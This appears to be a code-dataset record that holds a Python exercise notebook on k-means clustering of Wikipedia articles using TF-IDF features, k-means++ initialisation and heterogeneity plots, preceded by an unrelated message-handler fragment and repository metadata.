print(f"Sending AckMsg to party {m.pid} for receipt of ConfigMsg for {m.job_type} job.")
self.peer.send_ack(
m.pid,
"CONFIG",
m.job_type
)
def handle_ack_msg(self, m: AckMsg):
if self._check_dispatcher(m):
print(f"AckMsg of type {m.ack_type} received from party {m.pid} for {m.job_type} job.")
if m.ack_type == "CONFIG":
a = self.peer.dispatcher.parties_config[m.pid]["ACK"]
if isinstance(a, asyncio.Future):
if not a.done():
a.set_result(True)
def handle_request_msg(self, m: RequestMsg):
if self._check_dispatcher(m):
print(f"Request message for {m.request_type} received from party {m.pid} for {m.job_type} job.")
if m.request_type == "CONFIG":
self.peer.send_cfg(m.pid, self.peer.dispatcher.config_to_exchange, m.job_type)
| 35.62 | 108 | 0.590118 | 3,490 | 0.979787 | 0 | 0 | 0 | 0 | 0 | 0 | 962 | 0.270073 |
d3162e78a871415bab1f9452d82a894abaab0f56 | 44,224 | py | Python | Course-4-Clustering-and-Retrieval/week-3-k-means-with-text-data_blank.py | emetnatbelt/Machine-Learning-Univ-Washington1 | 6e6f9cd69b69157f5c09eed299ab120bf6764de3 | [
"MIT"
] | 20 | 2017-04-06T08:50:58.000Z | 2021-11-01T13:43:22.000Z | Course-4-Clustering-and-Retrieval/week-3-k-means-with-text-data_blank.py | emetnatbelt/Machine-Learning-Univ-Washington | 6e6f9cd69b69157f5c09eed299ab120bf6764de3 | [
"MIT"
] | null | null | null | Course-4-Clustering-and-Retrieval/week-3-k-means-with-text-data_blank.py | emetnatbelt/Machine-Learning-Univ-Washington | 6e6f9cd69b69157f5c09eed299ab120bf6764de3 | [
"MIT"
] | 24 | 2016-06-01T21:28:17.000Z | 2021-10-02T03:17:11.000Z |
# coding: utf-8
# # k-means with text data
# In this assignment you will
# * Cluster Wikipedia documents using k-means
# * Explore the role of random initialization on the quality of the clustering
# * Explore how results differ after changing the number of clusters
# * Evaluate clustering, both quantitatively and qualitatively
#
# When properly executed, clustering uncovers valuable insights from a set of unlabeled documents.
# **Note to Amazon EC2 users**: To conserve memory, make sure to stop all the other notebooks before running this notebook.
# ## Import necessary packages
# The following code block will check if you have the correct version of GraphLab Create. Any version later than 1.8.5 will do. To upgrade, read [this page](https://turi.com/download/upgrade-graphlab-create.html).
# In[1]:
import os
os.environ["OMP_NUM_THREADS"] = "1"  # keep BLAS single-threaded to conserve memory
import graphlab
# Warm-up call: forces GraphLab's lambda workers to start now, not mid-analysis.
graphlab.SArray(range(1000)).apply(lambda x: x)
# In[2]:
import matplotlib.pyplot as plt
import numpy as np
import sys
import os
from scipy.sparse import csr_matrix
get_ipython().magic(u'matplotlib inline')
'''Check GraphLab Create version'''
from distutils.version import StrictVersion
assert (StrictVersion(graphlab.version) >= StrictVersion('1.8.5')), 'GraphLab Create must be version 1.8.5 or later.'
# ## Load data, extract features
# To work with text data, we must first convert the documents into numerical features. As in the first assignment, let's extract TF-IDF features for each article.
# In[3]:
wiki = graphlab.SFrame('people_wiki.gl/')  # Wikipedia people dataset, one row per article
# In[4]:
# TF-IDF representation of each article's text, stored as a dict column.
wiki['tf_idf'] = graphlab.text_analytics.tf_idf(wiki['text'])
# For the remainder of the assignment, we will use sparse matrices. Sparse matrices are matrices that have a small number of nonzero entries. A good data structure for sparse matrices would only store the nonzero entries to save space and speed up computation. SciPy provides a highly-optimized library for sparse matrices. Many matrix operations available for NumPy arrays are also available for SciPy sparse matrices.
#
# We first convert the TF-IDF column (in dictionary format) into the SciPy sparse matrix format. We included plenty of comments for the curious; if you'd like, you may skip the next block and treat the function as a black box.
# In[5]:
def sframe_to_scipy(x, column_name):
    '''
    Convert a dict-typed column of an SFrame into a scipy CSR sparse matrix,
    where each (row_id, column_id, value) triple corresponds to the value of
    x[row_id][column_id] and column_id is derived from a key in the dictionary.

    Example
    >>> sparse_matrix, map_key_to_index = sframe_to_scipy(sframe, column_name)
    '''
    assert x[column_name].dtype() == dict, 'The chosen column must be dict type, representing sparse data.'
    # Build (row_id, feature, value) triples:
    # add a row number, then stack so every unique (row, key) pair gets a row.
    x = x.add_row_number()
    x = x.stack(column_name, ['feature', 'value'])
    # Map dictionary keys to integer column ids via a OneHotEncoder:
    # fit on the stacked data, then transform to get an 'encoded_features' column.
    encoder = graphlab.feature_engineering.OneHotEncoder(features=['feature'])
    encoder.fit(x)
    x = encoder.transform(x)
    # Keep the word <-> column-id mapping for later interpretation.
    feature_mapping = encoder['feature_encoding']
    # Each encoded dict has a single key: the integer feature id.
    x['feature_id'] = x['encoded_features'].dict_keys().apply(lambda keys: keys[0])
    # Assemble the CSR triples; shape is (number of rows, number of features).
    row_ids = np.array(x['id'])
    col_ids = np.array(x['feature_id'])
    values = np.array(x['value'])
    num_rows = x['id'].max() + 1
    num_cols = x['feature_id'].max() + 1
    sparse_mat = csr_matrix((values, (row_ids, col_ids)), shape=(num_rows, num_cols))
    return sparse_mat, feature_mapping
# In[6]:
# The conversion will take about a minute or two.
tf_idf, map_index_to_word = sframe_to_scipy(wiki, 'tf_idf')
# In[7]:
# Inspect the sparse matrix: rows = documents, columns = unique words.
tf_idf
# The above matrix contains a TF-IDF score for each of the 59071 pages in the data set and each of the 547979 unique words.
# ## Normalize all vectors
# As discussed in the previous assignment, Euclidean distance can be a poor metric of similarity between documents, as it unfairly penalizes long articles. For a reasonable assessment of similarity, we should disregard the length information and use length-agnostic metrics, such as cosine distance.
#
# The k-means algorithm does not directly work with cosine distance, so we take an alternative route to remove length information: we normalize all vectors to be unit length. It turns out that Euclidean distance closely mimics cosine distance when all vectors are unit length. In particular, the squared Euclidean distance between any two vectors of length one is directly proportional to their cosine distance.
#
# We can prove this as follows. Let $\mathbf{x}$ and $\mathbf{y}$ be normalized vectors, i.e. unit vectors, so that $\|\mathbf{x}\|=\|\mathbf{y}\|=1$. Write the squared Euclidean distance as the dot product of $(\mathbf{x} - \mathbf{y})$ to itself:
# \begin{align*}
# \|\mathbf{x} - \mathbf{y}\|^2 &= (\mathbf{x} - \mathbf{y})^T(\mathbf{x} - \mathbf{y})\\
# &= (\mathbf{x}^T \mathbf{x}) - 2(\mathbf{x}^T \mathbf{y}) + (\mathbf{y}^T \mathbf{y})\\
# &= \|\mathbf{x}\|^2 - 2(\mathbf{x}^T \mathbf{y}) + \|\mathbf{y}\|^2\\
# &= 2 - 2(\mathbf{x}^T \mathbf{y})\\
# &= 2(1 - (\mathbf{x}^T \mathbf{y}))\\
# &= 2\left(1 - \frac{\mathbf{x}^T \mathbf{y}}{\|\mathbf{x}\|\|\mathbf{y}\|}\right)\\
# &= 2\left[\text{cosine distance}\right]
# \end{align*}
#
# This tells us that two **unit vectors** that are close in Euclidean distance are also close in cosine distance. Thus, the k-means algorithm (which naturally uses Euclidean distances) on normalized vectors will produce the same results as clustering using cosine distance as a distance metric.
#
# We import the [`normalize()` function](http://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.normalize.html) from scikit-learn to normalize all vectors to unit length.
# In[8]:
from sklearn.preprocessing import normalize
# Normalize every row to unit length so squared Euclidean distance is
# proportional to cosine distance (see derivation above).
tf_idf = normalize(tf_idf)
# ## Implement k-means
# Let us implement the k-means algorithm. First, we choose an initial set of centroids. A common practice is to choose randomly from the data points.
#
# **Note:** We specify a seed here, so that everyone gets the same answer. In practice, we highly recommend to use different seeds every time (for instance, by using the current timestamp).
# In[9]:
def get_initial_centroids(data, k, seed=None):
    '''Pick k rows of `data` uniformly at random (with replacement) to serve
    as initial centroids; returned as a dense (k, d) array.'''
    if seed is not None:  # fixing the seed makes runs reproducible
        np.random.seed(seed)
    num_points = data.shape[0]
    # Draw k row indices from [0, num_points).
    chosen = np.random.randint(0, num_points, k)
    # Densify the chosen rows: centroids become dense after averaging anyway,
    # since any word present in any member document gets a nonzero weight.
    return data[chosen, :].toarray()
# After initialization, the k-means algorithm iterates between the following two steps:
# 1. Assign each data point to the closest centroid.
# $$
# z_i \gets \mathrm{argmin}_j \|\mu_j - \mathbf{x}_i\|^2
# $$
# 2. Revise centroids as the mean of the assigned data points.
# $$
# \mu_j \gets \frac{1}{n_j}\sum_{i:z_i=j} \mathbf{x}_i
# $$
# In pseudocode, we iteratively do the following:
# ```
# cluster_assignment = assign_clusters(data, centroids)
# centroids = revise_centroids(data, k, cluster_assignment)
# ```
# ### Assigning clusters
# How do we implement Step 1 of the main k-means loop above? First import `pairwise_distances` function from scikit-learn, which calculates Euclidean distances between rows of given arrays. See [this documentation](http://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise.pairwise_distances.html) for more information.
#
# For the sake of demonstration, let's look at documents 100 and 101 (selected by the slice `100:102`) as query documents and compute the distances between each of these documents and every other document in the corpus. In the k-means algorithm, we will have to compute pairwise distances between the set of centroids and the set of documents.
# In[10]:
from sklearn.metrics import pairwise_distances
# Get the TF-IDF vectors for documents 100 through 102.
# NOTE(review): the slice 100:102 actually selects only rows 100 and 101.
queries = tf_idf[100:102,:]
# Compute pairwise distances from every data point to each query vector.
dist = pairwise_distances(tf_idf, queries, metric='euclidean')
print dist
# More formally, `dist[i,j]` is assigned the distance between the `i`th row of `X` (i.e., `X[i,:]`) and the `j`th row of `Y` (i.e., `Y[j,:]`).
# **Checkpoint:** For a moment, suppose that we initialize three centroids with the first 3 rows of `tf_idf`. Write code to compute distances from each of the centroids to all data points in `tf_idf`. Then find the distance between row 430 of `tf_idf` and the second centroid and save it to `dist`.
# In[14]:
# Students should write code here
centroids = tf_idf[:3,:]  # first three documents as provisional centroids
distances = pairwise_distances(tf_idf, centroids, metric='euclidean')
distances.shape  # (num_documents, 3)
# In[15]:
dist = distances[430, 1]  # distance from document 430 to the second centroid
# In[16]:
'''Test cell'''
if np.allclose(dist, pairwise_distances(tf_idf[430,:], tf_idf[1,:])):
    print('Pass')
else:
    print('Check your code again')
# **Checkpoint:** Next, given the pairwise distances, we take the minimum of the distances for each data point. Fittingly, NumPy provides an `argmin` function. See [this documentation](http://docs.scipy.org/doc/numpy-1.10.1/reference/generated/numpy.argmin.html) for details.
#
# Read the documentation and write code to produce a 1D array whose i-th entry indicates the centroid that is the closest to the i-th data point. Use the list of distances from the previous checkpoint and save them as `distances`. The value 0 indicates closeness to the first centroid, 1 indicates closeness to the second centroid, and so forth. Save this array as `closest_cluster`.
#
# **Hint:** the resulting array should be as long as the number of data points.
# In[17]:
# Students should write code here
# Index of the nearest centroid (0, 1, or 2) for every document.
closest_cluster = np.argmin(distances, axis=1)
# In[18]:
'''Test cell'''
reference = [list(row).index(min(row)) for row in distances]
if np.allclose(closest_cluster, reference):
    print('Pass')
else:
    print('Check your code again')
# **Checkpoint:** Let's put these steps together. First, initialize three centroids with the first 3 rows of `tf_idf`. Then, compute distances from each of the centroids to all data points in `tf_idf`. Finally, use these distance calculations to compute cluster assignments and assign them to `cluster_assignment`.
# In[19]:
# Students should write code here
centroids = tf_idf[:3,:]
distances = pairwise_distances(tf_idf, centroids, metric='euclidean')
cluster_assignment = np.argmin(distances, axis=1)
# In[20]:
# np.bincount counts the number of documents assigned to each cluster.
if len(cluster_assignment)==59071 and np.array_equal(np.bincount(cluster_assignment), np.array([23061, 10086, 25924])):
    print('Pass') # count number of data points for each cluster
else:
    print('Check your code again.')
# Now we are ready to fill in the blanks in this function:
# In[21]:
def assign_clusters(data, centroids):
    '''Label every row of `data` with the index of its nearest centroid
    under Euclidean distance; returns a 1D array of cluster indices.'''
    # Distance matrix: entry (i, j) is the distance from point i to centroid j.
    dist_to_centroids = pairwise_distances(data, centroids, metric='euclidean')
    # The nearest centroid per point is the argmin along the centroid axis.
    return np.argmin(dist_to_centroids, axis=1)
# **Checkpoint**. For the last time, let us check if Step 1 was implemented correctly. With rows 0, 2, 4, and 6 of `tf_idf` as an initial set of centroids, we assign cluster labels to rows 0, 10, 20, ..., and 90 of `tf_idf`. The resulting cluster labels should be `[0, 1, 1, 0, 0, 2, 0, 2, 2, 1]`.
# In[22]:
# Sanity check: with rows 0,2,4,6 as centroids, rows 0,10,...,90 get these labels.
if np.allclose(assign_clusters(tf_idf[0:100:10], tf_idf[0:8:2]), np.array([0, 1, 1, 0, 0, 2, 0, 2, 2, 1])):
    print('Pass')
else:
    print('Check your code again.')
# ### Revising clusters
# Let's turn to Step 2, where we compute the new centroids given the cluster assignments.
# SciPy and NumPy arrays allow for filtering via Boolean masks. For instance, we filter all data points that are assigned to cluster 0 by writing
# ```
# data[cluster_assignment==0,:]
# ```
# To develop intuition about filtering, let's look at a toy example consisting of 3 data points and 2 clusters.
# In[23]:
# Toy example: 3 data points, 2 centroids, to illustrate Boolean-mask filtering.
data = np.array([[1., 2., 0.],
                 [0., 0., 0.],
                 [2., 2., 0.]])
centroids = np.array([[0.5, 0.5, 0.],
                      [0., -0.5, 0.]])
# Let's assign these data points to the closest centroid.
# In[24]:
cluster_assignment = assign_clusters(data, centroids)
print cluster_assignment
# The expression `cluster_assignment==1` gives a list of Booleans that says whether each data point is assigned to cluster 1 or not:
# In[25]:
cluster_assignment==1
# Likewise for cluster 0:
# In[27]:
cluster_assignment==0
# In lieu of indices, we can put in the list of Booleans to pick and choose rows. Only the rows that correspond to a `True` entry will be retained.
#
# First, let's look at the data points (i.e., their values) assigned to cluster 1:
# In[28]:
data[cluster_assignment==1]
# This makes sense since [0 0 0] is closer to [0 -0.5 0] than to [0.5 0.5 0].
#
# Now let's look at the data points assigned to cluster 0:
# In[29]:
data[cluster_assignment==0]
# Again, this makes sense since these values are each closer to [0.5 0.5 0] than to [0 -0.5 0].
#
# Given all the data points in a cluster, it only remains to compute the mean. Use [np.mean()](http://docs.scipy.org/doc/numpy-1.10.0/reference/generated/numpy.mean.html). By default, the function averages all elements in a 2D array. To compute row-wise or column-wise means, add the `axis` argument. See the linked documentation for details.
#
# Use this function to average the data points in cluster 0:
# In[30]:
data[cluster_assignment==0].mean(axis=0)
# We are now ready to complete this function:
# In[31]:
def revise_centroids(data, k, cluster_assignment):
    """Recompute each of the k centroids as the mean of its assigned points.

    Parameters:
        data: sparse matrix (or numpy.matrix-producing array), shape (n, d)
        k: number of clusters
        cluster_assignment: 1D array of length n with values in [0, k)

    Returns:
        ndarray of shape (k, d) holding the updated centroids.
    """
    new_centroids = []
    # `range` instead of Python-2-only `xrange`: identical iteration in
    # Python 2 (k is small) and makes the function runnable on Python 3.
    for i in range(k):
        # Select all data points that belong to cluster i.
        member_data_points = data[cluster_assignment == i]
        # Mean over member rows; for scipy sparse input this yields a
        # numpy.matrix, which .A1 flattens to a 1D ndarray.
        centroid = member_data_points.mean(axis=0)
        centroid = centroid.A1
        new_centroids.append(centroid)
    new_centroids = np.array(new_centroids)
    return new_centroids
# **Checkpoint**. Let's check our Step 2 implementation. Letting rows 0, 10, ..., 90 of `tf_idf` as the data points and the cluster labels `[0, 1, 1, 0, 0, 2, 0, 2, 2, 1]`, we compute the next set of centroids. Each centroid is given by the average of all member data points in corresponding cluster.
# In[32]:
# Sanity check: centroids of rows 0,10,...,90 under the fixed label vector.
result = revise_centroids(tf_idf[0:100:10], 3, np.array([0, 1, 1, 0, 0, 2, 0, 2, 2, 1]))
if np.allclose(result[0], np.mean(tf_idf[[0,30,40,60]].toarray(), axis=0)) and np.allclose(result[1], np.mean(tf_idf[[10,20,90]].toarray(), axis=0)) and np.allclose(result[2], np.mean(tf_idf[[50,70,80]].toarray(), axis=0)):
    print('Pass')
else:
    print('Check your code')
# ### Assessing convergence
# How can we tell if the k-means algorithm is converging? We can look at the cluster assignments and see if they stabilize over time. In fact, we'll be running the algorithm until the cluster assignments stop changing at all. To be extra safe, and to assess the clustering performance, we'll be looking at an additional criteria: the sum of all squared distances between data points and centroids. This is defined as
# $$
# J(\mathcal{Z},\mu) = \sum_{j=1}^k \sum_{i:z_i = j} \|\mathbf{x}_i - \mu_j\|^2.
# $$
# The smaller the distances, the more homogeneous the clusters are. In other words, we'd like to have "tight" clusters.
# In[33]:
def compute_heterogeneity(data, k, centroids, cluster_assignment):
    """Return the k-means objective: the sum of squared Euclidean distances
    from every data point to the centroid of its assigned cluster.

    Lower values mean tighter (more homogeneous) clusters. Empty clusters
    contribute nothing.
    """
    heterogeneity = 0.0
    # `range` instead of Python-2-only `xrange`: identical iteration in
    # Python 2 and also runs on Python 3.
    for i in range(k):
        # Select all data points that belong to cluster i.
        member_data_points = data[cluster_assignment==i, :]
        if member_data_points.shape[0] > 0: # skip empty clusters: pairwise_distances rejects empty input
            # Distances from each member point to its cluster's centroid.
            distances = pairwise_distances(member_data_points, [centroids[i]], metric='euclidean')
            squared_distances = distances**2
            heterogeneity += np.sum(squared_distances)
    return heterogeneity
# Let's compute the cluster heterogeneity for the 2-cluster example we've been considering based on our current cluster assignments and centroids.
# In[34]:
# Heterogeneity of the toy 2-cluster clustering computed above.
compute_heterogeneity(data, 2, centroids, cluster_assignment)
# ### Combining into a single function
# Once the two k-means steps have been implemented, as well as our heterogeneity metric we wish to monitor, it is only a matter of putting these functions together to write a k-means algorithm that
#
# * Repeatedly performs Steps 1 and 2
# * Tracks convergence metrics
# * Stops if either no assignment changed or we reach a certain number of iterations.
# In[35]:
# Fill in the blanks
def kmeans(data, k, initial_centroids, maxiter, record_heterogeneity=None, verbose=False):
'''This function runs k-means on given data and initial set of centroids.
maxiter: maximum number of iterations to run.
record_heterogeneity: (optional) a list, to store the history of heterogeneity as function of iterations
if None, do not store the history.
verbose: if True, print how many data points changed their cluster labels in each iteration'''
centroids = initial_centroids[:]
prev_cluster_assignment = None
for itr in xrange(maxiter):
if verbose:
print(itr)
# 1. Make cluster assignments using nearest centroids
# YOUR CODE HERE
cluster_assignment = assign_clusters(data, centroids)
# 2. Compute a new centroid for each of the k clusters, averaging all data points assigned to that cluster.
# YOUR CODE HERE
centroids = revise_centroids(data, k, cluster_assignment)
# Check for convergence: if none of the assignments changed, stop
if prev_cluster_assignment is not None and (prev_cluster_assignment==cluster_assignment).all():
break
# Print number of new assignments
if prev_cluster_assignment is not None:
num_changed = np.sum(prev_cluster_assignment!=cluster_assignment)
if verbose:
print(' {0:5d} elements changed their cluster assignment.'.format(num_changed))
# Record heterogeneity convergence metric
if record_heterogeneity is not None:
# YOUR CODE HERE
score = compute_heterogeneity(data, k, centroids, cluster_assignment)
record_heterogeneity.append(score)
prev_cluster_assignment = cluster_assignment[:]
return centroids, cluster_assignment
# ## Plotting convergence metric
# We can use the above function to plot the convergence metric across iterations.
# In[36]:
def plot_heterogeneity(heterogeneity, k):
    '''Plot the recorded heterogeneity values against iteration number
    for a k-means run with K=k clusters.'''
    plt.figure(figsize=(7,4))
    plt.plot(heterogeneity, linewidth=4)
    plt.xlabel('# Iterations')
    plt.ylabel('Heterogeneity')
    plt.title('Heterogeneity of clustering over time, K={0:d}'.format(k))
    plt.rcParams.update({'font.size': 16})
    plt.tight_layout()
# Let's consider running k-means with K=3 clusters for a maximum of 400 iterations, recording cluster heterogeneity at every step. Then, let's plot the heterogeneity over iterations using the plotting function above.
# In[37]:
# Single k-means run with K=3, recording heterogeneity at every iteration.
k = 3
heterogeneity = []
initial_centroids = get_initial_centroids(tf_idf, k, seed=0)
centroids, cluster_assignment = kmeans(tf_idf, k, initial_centroids, maxiter=400,
                                       record_heterogeneity=heterogeneity, verbose=True)
plot_heterogeneity(heterogeneity, k)
# **Quiz Question**. (True/False) The clustering objective (heterogeneity) is non-increasing for this example.
# **Quiz Question**. Let's step back from this particular example. If the clustering objective (heterogeneity) would ever increase when running k-means, that would indicate: (choose one)
#
# 1. k-means algorithm got stuck in a bad local minimum
# 2. There is a bug in the k-means code
# 3. All data points consist of exact duplicates
# 4. Nothing is wrong. The objective should generally go down sooner or later.
# **Quiz Question**. Which of the cluster contains the greatest number of data points in the end? Hint: Use [`np.bincount()`](http://docs.scipy.org/doc/numpy-1.11.0/reference/generated/numpy.bincount.html) to count occurrences of each cluster label.
# 1. Cluster #0
# 2. Cluster #1
# 3. Cluster #2
# In[38]:
# Cluster sizes; the largest count answers the quiz question above.
np.bincount(cluster_assignment)
# ## Beware of local maxima
# One weakness of k-means is that it tends to get stuck in a local minimum. To see this, let us run k-means multiple times, with different initial centroids created using different random seeds.
#
# **Note:** Again, in practice, you should set different seeds for every run. We give you a list of seeds for this assignment so that everyone gets the same answer.
#
# This may take several minutes to run.
# In[40]:
k = 10
heterogeneity = {}
import time
start = time.time()
for seed in [0, 20000, 40000, 60000, 80000, 100000, 120000]:
initial_centroids = get_initial_centroids(tf_idf, k, seed)
centroids, cluster_assignment = kmeans(tf_idf, k, initial_centroids, maxiter=400,
record_heterogeneity=None, verbose=False)
# To save time, compute heterogeneity only once in the end
heterogeneity[seed] = compute_heterogeneity(tf_idf, k, centroids, cluster_assignment)
# New line for quiz question
print('seed={0:06d}, heterogeneity={1:.5f}, max cluster size={2}'.format(seed, heterogeneity[seed], max(np.bincount(cluster_assignment))))
sys.stdout.flush()
end = time.time()
print(end-start)
# Notice the variation in heterogeneity for different initializations. This indicates that k-means sometimes gets stuck at a bad local minimum.
# **Quiz Question**. Another way to capture the effect of changing initialization is to look at the distribution of cluster assignments. Add a line to the code above to compute the size (# of member data points) of clusters for each run of k-means. Look at the size of the largest cluster (most # of member data points) across multiple runs, with seeds 0, 20000, ..., 120000. How much does this measure vary across the runs? What is the minimum and maximum values this quantity takes?
# One effective way to counter this tendency is to use **k-means++** to provide a smart initialization. This method tries to spread out the initial set of centroids so that they are not too close together. It is known to improve the quality of local optima and lower average runtime.
# In[41]:
def smart_initialize(data, k, seed=None):
    '''Use k-means++ to initialize a good set of centroids.

    Returns a dense (k, d) array of centroids chosen so that each new centroid
    is sampled with probability proportional to its squared distance from the
    nearest already-chosen centroid.
    '''
    if seed is not None: # useful for obtaining consistent results
        np.random.seed(seed)
    centroids = np.zeros((k, data.shape[1]))
    # Randomly choose the first centroid.
    # Since we have no prior knowledge, choose uniformly at random
    idx = np.random.randint(data.shape[0])
    centroids[0] = data[idx,:].toarray()
    # Compute distances from the first centroid chosen to all the other data points
    squared_distances = pairwise_distances(data, centroids[0:1], metric='euclidean').flatten()**2
    # `range` instead of Python-2-only `xrange`: identical iteration in
    # Python 2 and also runs on Python 3.
    for i in range(1, k):
        # Choose the next centroid randomly, so that the probability for each data point to be chosen
        # is directly proportional to its squared distance from the nearest centroid.
        # Roughly speaking, a new centroid should be as far from the other centroids as possible.
        idx = np.random.choice(data.shape[0], 1, p=squared_distances/sum(squared_distances))
        centroids[i] = data[idx,:].toarray()
        # Now compute distances from the enlarged centroid set to all data points
        squared_distances = np.min(pairwise_distances(data, centroids[0:i+1], metric='euclidean')**2,axis=1)
    return centroids
# Let's now rerun k-means with 10 clusters using the same set of seeds, but always using k-means++ to initialize the algorithm.
#
# This may take several minutes to run.
# In[42]:
# Repeat the 7-seed experiment, now initializing with k-means++.
k = 10
heterogeneity_smart = {}
start = time.time()
for seed in [0, 20000, 40000, 60000, 80000, 100000, 120000]:
    initial_centroids = smart_initialize(tf_idf, k, seed)
    centroids, cluster_assignment = kmeans(tf_idf, k, initial_centroids, maxiter=400,
                                           record_heterogeneity=None, verbose=False)
    # To save time, compute heterogeneity only once in the end
    heterogeneity_smart[seed] = compute_heterogeneity(tf_idf, k, centroids, cluster_assignment)
    print('seed={0:06d}, heterogeneity={1:.5f}'.format(seed, heterogeneity_smart[seed]))
    sys.stdout.flush()
end = time.time()
print(end-start)
# Let's compare the set of cluster heterogeneities we got from our 7 restarts of k-means using random initialization compared to the 7 restarts of k-means using k-means++ as a smart initialization.
#
# The following code produces a [box plot](http://matplotlib.org/api/pyplot_api.html) for each of these methods, indicating the spread of values produced by each method.
# In[43]:
plt.figure(figsize=(8,5))
plt.boxplot([heterogeneity.values(), heterogeneity_smart.values()], vert=False)
plt.yticks([1, 2], ['k-means', 'k-means++'])
plt.rcParams.update({'font.size': 16})
plt.tight_layout()
# A few things to notice from the box plot:
# * On average, k-means++ produces a better clustering than Random initialization.
# * Variation in clustering quality is smaller for k-means++.
# **In general, you should run k-means at least a few times with different initializations and then return the run resulting in the lowest heterogeneity.** Let us write a function that runs k-means multiple times and picks the best run that minimizes heterogeneity. The function accepts an optional list of seed values to be used for the multiple runs; if no such list is provided, the current UTC time is used as seed values.
# In[44]:
def kmeans_multiple_runs(data, k, maxiter, num_runs, seed_list=None, verbose=False):
    """Run k-means `num_runs` times with k-means++ initialization and return
    the (centroids, cluster_assignment) of the run with lowest heterogeneity.

    seed_list: optional list of seeds (one per run); if None, the current
               UTC time is used as the seed for each run.
    verbose: if True, print the heterogeneity achieved by each run.
    """
    heterogeneity = {}
    min_heterogeneity_achieved = float('inf')
    final_centroids = None
    final_cluster_assignment = None
    # `range` instead of Python-2-only `xrange`: identical iteration in
    # Python 2 and also runs on Python 3.
    for i in range(num_runs):
        # Use the caller's seed when provided; otherwise fall back to UTC time.
        seed = seed_list[i] if seed_list is not None else int(time.time())
        np.random.seed(seed)
        # Use k-means++ initialization
        initial_centroids = smart_initialize(data, k, seed)
        # Run k-means
        centroids, cluster_assignment = kmeans(data, k, initial_centroids, maxiter, record_heterogeneity=None, verbose=False)
        # To save time, compute heterogeneity only once in the end
        heterogeneity[seed] = compute_heterogeneity(data, k, centroids, cluster_assignment)
        if verbose:
            print('seed={0:06d}, heterogeneity={1:.5f}'.format(seed, heterogeneity[seed]))
            sys.stdout.flush()
        # Keep the best (lowest-heterogeneity) run seen so far.
        if heterogeneity[seed] < min_heterogeneity_achieved:
            min_heterogeneity_achieved = heterogeneity[seed]
            final_centroids = centroids
            final_cluster_assignment = cluster_assignment
    # Return the centroids and cluster assignments that minimize heterogeneity.
    return final_centroids, final_cluster_assignment
# ## How to choose K
# Since we are measuring the tightness of the clusters, a higher value of K reduces the possible heterogeneity metric by definition. For example, if we have N data points and set K=N clusters, then we could have 0 cluster heterogeneity by setting the N centroids equal to the values of the N data points. (Note: Not all runs for larger K will result in lower heterogeneity than a single run with smaller K due to local optima.) Let's explore this general trend for ourselves by performing the following analysis.
# Use the `kmeans_multiple_runs` function to run k-means with five different values of K. For each K, use k-means++ and multiple runs to pick the best solution. In what follows, we consider K=2,10,25,50,100 and 7 restarts for each setting.
#
# **IMPORTANT: The code block below will take about one hour to finish. We highly suggest that you use the arrays that we have computed for you.**
#
# Side note: In practice, a good implementation of k-means would utilize parallelism to run multiple runs of k-means at once. For an example, see [scikit-learn's KMeans](http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html).
# In[ ]:
#def plot_k_vs_heterogeneity(k_values, heterogeneity_values):
# plt.figure(figsize=(7,4))
# plt.plot(k_values, heterogeneity_values, linewidth=4)
# plt.xlabel('K')
# plt.ylabel('Heterogeneity')
# plt.title('K vs. Heterogeneity')
# plt.rcParams.update({'font.size': 16})
# plt.tight_layout()
#start = time.time()
#centroids = {}
#cluster_assignment = {}
#heterogeneity_values = []
#k_list = [2, 10, 25, 50, 100]
#seed_list = [0, 20000, 40000, 60000, 80000, 100000, 120000]
#for k in k_list:
# heterogeneity = []
# centroids[k], cluster_assignment[k] = kmeans_multiple_runs(tf_idf, k, maxiter=400,
# num_runs=len(seed_list),
# seed_list=seed_list,
# verbose=True)
# score = compute_heterogeneity(tf_idf, k, centroids[k], cluster_assignment[k])
# heterogeneity_values.append(score)
#plot_k_vs_heterogeneity(k_list, heterogeneity_values)
#end = time.time()
#print(end-start)
# To use the pre-computed NumPy arrays, first download kmeans-arrays.npz as mentioned in the reading for this assignment and load them with the following code. Make sure the downloaded file is in the same directory as this notebook.
# In[45]:
def plot_k_vs_heterogeneity(k_values, heterogeneity_values):
    '''Plot the final heterogeneity achieved for each choice of K.'''
    plt.figure(figsize=(7,4))
    plt.plot(k_values, heterogeneity_values, linewidth=4)
    plt.xlabel('K')
    plt.ylabel('Heterogeneity')
    plt.title('K vs. Heterogeneity')
    plt.rcParams.update({'font.size': 16})
    plt.tight_layout()
# Load pre-computed centroids/assignments for K in {2,10,25,50,100} and plot
# heterogeneity vs K. The arrays are loaded lazily (see docstring below).
filename = 'kmeans-arrays.npz'
heterogeneity_values = []
k_list = [2, 10, 25, 50, 100]
if os.path.exists(filename):
    arrays = np.load(filename)
    centroids = {}
    cluster_assignment = {}
    for k in k_list:
        print k
        sys.stdout.flush()
        '''To save memory space, do not load the arrays from the file right away. We use
           a technique known as lazy evaluation, where some expressions are not evaluated
           until later. Any expression appearing inside a lambda function doesn't get
           evaluated until the function is called.
           Lazy evaluation is extremely important in memory-constrained setting, such as
           an Amazon EC2 t2.micro instance.'''
        # k=k default binds the loop variable at definition time (avoids the
        # late-binding-closure pitfall where every lambda would see the last k).
        centroids[k] = lambda k=k: arrays['centroids_{0:d}'.format(k)]
        cluster_assignment[k] = lambda k=k: arrays['cluster_assignment_{0:d}'.format(k)]
        score = compute_heterogeneity(tf_idf, k, centroids[k](), cluster_assignment[k]())
        heterogeneity_values.append(score)
    plot_k_vs_heterogeneity(k_list, heterogeneity_values)
else:
    print('File not found. Skipping.')
# In the above plot we show that heterogeneity goes down as we increase the number of clusters. Does this mean we should always favor a higher K? **Not at all!** As we will see in the following section, setting K too high may end up separating data points that are actually pretty alike. At the extreme, we can set individual data points to be their own clusters (K=N) and achieve zero heterogeneity, but separating each data point into its own cluster is hardly a desirable outcome. In the following section, we will learn how to detect a K set "too large".
# ## Visualize clusters of documents
# Let's start visualizing some clustering results to see if we think the clustering makes sense. We can use such visualizations to help us assess whether we have set K too large or too small for a given application. Following the theme of this course, we will judge whether the clustering makes sense in the context of document analysis.
#
# What are we looking for in a good clustering of documents?
# * Documents in the same cluster should be similar.
# * Documents from different clusters should be less similar.
#
# So a bad clustering exhibits either of two symptoms:
# * Documents in a cluster have mixed content.
# * Documents with similar content are divided up and put into different clusters.
#
# To help visualize the clustering, we do the following:
